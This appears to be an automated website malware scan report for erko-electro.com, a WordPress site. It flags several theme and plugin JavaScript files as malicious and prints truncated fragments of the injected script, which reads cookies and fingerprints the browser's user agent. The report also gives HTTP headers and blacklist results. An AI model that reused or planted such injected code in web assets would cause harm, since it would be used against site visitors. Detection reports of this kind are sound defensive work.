Scanned pages/files
Request | Server response | Status |
http://erko-electro.com/ | 200 OK Content-Length: 30289 Content-Type: text/html | clean |
http://erko-electro.com/wp-content/themes/twentytwelve/js/whcookies.js | 200 OK Content-Length: 3165 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki message_container.innerHTML = html_code; document.body.appendChild(message_container); } } function WHCloseCookiesWindow() { WHCreateCookie('cookies_accepted', 'T', 365); document.getElementById('cookies-message-container').removeChild(document.getElementById('cookies-message')); } Antivirus reports:
| ||
http://erko-electro.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97528 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki jQuery.noConflict(); Antivirus reports:
| ||
http://erko-electro.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8326 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.9.3 | 200 OK Content-Length: 1512 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki jQuery(document).ready(function($) { $('.dropdown li').hover( function(){ $(this).addClass('hover'); }, function(){ $(this).removeClass('hover'); }); $(".dropdown li:has(ul)").addClass("parent"); $('ul li:first-child').addClass('first-child'); $('ul li:last-child').addClass('last-child'); }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/wp-survey-and-quiz-tool/js/site.js?ver=3.9.3 | 200 OK Content-Length: 2027 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki jQuery(this).siblings('.wpsqt-show-toggle').show(); jQuery(this).hide(); return false; }); jQuery('.wpst_question input, .wpst_question textarea').click( function() { var explanationText = jQuery(this).parents('.wpst_question').children('.wpsqt-answer-explanation:hidden'); if (explanationText.length != 0) { jQuery(explanationText).siblings('.wpsqt-show-answer').show(); } }); }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 | 200 OK Content-Length: 10648 Content-Type: application/javascript | clean |
http://erko-electro.com/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 9223 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/plugins/vslider/js/vslider.js?ver=3.9.3 | 200 OK Content-Length: 16743 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki var div_id = jQuery(".coin-slider").find("div").attr("id"); var window_width = jQuery(window).width(); if (div_id == "Slajder" || div_id == "DE" || div_id == "RU" || div_id == "EN") { var old_style = jQuery("#"+div_id).attr("style"); if (window_width < 1437) { var new_style = old_style.replace(1437, 1024); } else { var new_style = old_style.replace(1024, 1437); } jQuery("#"+div_id).attr("style", new_style); } }); Antivirus reports:
| ||
http://erko-electro.com/wp-content/themes/twentytwelve/js/jquery.hoverIntent.minified.js | 200 OK Content-Length: 2879 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(b){var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return a?decodeURIComponent(a[1]):undefined}(function(){function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}var i=(getCooki Antivirus reports:
| ||
http://erko-electro.com/erkocompany/ | 200 OK Content-Length: 27810 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/mission/ | 200 OK Content-Length: 27684 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/quality-policy/ | 200 OK Content-Length: 29216 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/awards-and-prizes/ | 200 OK Content-Length: 31178 Content-Type: text/html | clean |
http://erko-electro.com/erkocompany/eu-projects/ | 200 OK Content-Length: 34311 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: erko-electro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 13:41:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8itq1vvljm8rrj1s3to0d8cab6; path=/
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=erko-electro.com
X-Powered-By: PHP/5.3.29
GET / HTTP/1.1
Host: erko-electro.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 18 Dec 2014 13:41:39 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=8itq1vvljm8rrj1s3to0d8cab6; path=/
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=erko-electro.com
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: erko-electro.com
Referer: http://www.google.com/search?q=erko-electro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: erko-electro.com
Referer: http://www.google.com/search?q=erko-electro.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=erko-electro.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://erko-electro.com/
Result: erko-electro.com is not infected or malware details are not published yet.
Result: erko-electro.com is not infected or malware details are not published yet.